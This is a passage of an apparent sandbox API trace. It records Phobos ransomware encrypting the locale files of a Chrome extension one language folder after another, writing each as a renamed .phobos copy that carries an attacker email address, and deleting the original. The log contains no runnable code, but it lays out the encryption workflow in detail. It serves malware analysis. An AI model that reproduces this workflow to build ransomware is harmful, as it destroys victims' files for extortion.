hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100, dwBufLen=0x100 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x100) returned 1 [0151.306] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x100, lpOverlapped=0x0) returned 1 [0151.307] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.307] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.307] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.307] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.307] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.307] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.307] CloseHandle (hObject=0x130) returned 1 [0151.307] CloseHandle (hObject=0x138) returned 1 [0151.308] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\sv\\messages.json")) returned 1 [0151.309] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.309] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.309] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=356) returned 1 [0151.309] CloseHandle (hObject=0x138) returned 1 [0151.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json")) returned 0x2020 [0151.309] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.310] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.310] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.310] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.310] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.310] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.310] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x164, lpOverlapped=0x0) returned 1 [0151.311] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170, dwBufLen=0x170 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170) returned 1 [0151.311] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x170, lpOverlapped=0x0) returned 1 [0151.312] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.312] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.312] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.312] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.312] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.313] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.313] CloseHandle (hObject=0x138) returned 1 [0151.313] CloseHandle (hObject=0x130) returned 1 [0151.313] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\th\\messages.json")) returned 1 [0151.314] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.314] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=270) returned 1 [0151.314] CloseHandle (hObject=0x130) returned 1 [0151.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json")) returned 0x2020 [0151.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.314] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.314] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.315] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.315] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.315] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x10e, lpOverlapped=0x0) returned 1 [0151.316] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110, dwBufLen=0x110 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x110) returned 1 [0151.316] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x110, lpOverlapped=0x0) returned 1 [0151.317] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.317] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.317] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.317] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.317] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.317] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.317] CloseHandle (hObject=0x130) returned 1 [0151.317] CloseHandle (hObject=0x138) returned 1 [0151.317] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\tr\\messages.json")) returned 1 [0151.318] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.318] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.319] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=353) returned 1 [0151.319] CloseHandle (hObject=0x138) returned 1 [0151.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json")) returned 0x2020 [0151.319] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.319] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.319] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.319] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.320] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.320] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.320] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x161, lpOverlapped=0x0) returned 1 [0151.320] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170, dwBufLen=0x170 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x170) returned 1 [0151.321] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x170, lpOverlapped=0x0) returned 1 [0151.321] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.321] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.321] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.321] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.321] WriteFile (in: hFile=0x130, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.322] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.322] CloseHandle (hObject=0x138) returned 1 [0151.322] CloseHandle (hObject=0x130) returned 1 [0151.322] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\uk\\messages.json")) returned 1 [0151.323] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.323] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=279) returned 1 [0151.323] CloseHandle (hObject=0x130) returned 1 [0151.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json")) returned 0x2020 [0151.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0151.323] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.323] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.324] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.324] ReadFile (in: hFile=0x130, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x117, lpOverlapped=0x0) returned 1 [0151.325] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0151.325] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0151.326] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32d28) returned 1 [0151.326] CryptSetKeyParam (hKey=0xa32d28, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.326] CryptEncrypt (in: hKey=0xa32d28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.326] CryptDestroyKey (hKey=0xa32d28) returned 1 [0151.326] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.326] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.326] CloseHandle (hObject=0x130) returned 1 [0151.326] CloseHandle (hObject=0x138) returned 1 [0151.326] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\vi\\messages.json")) returned 1 [0151.334] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.335] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user 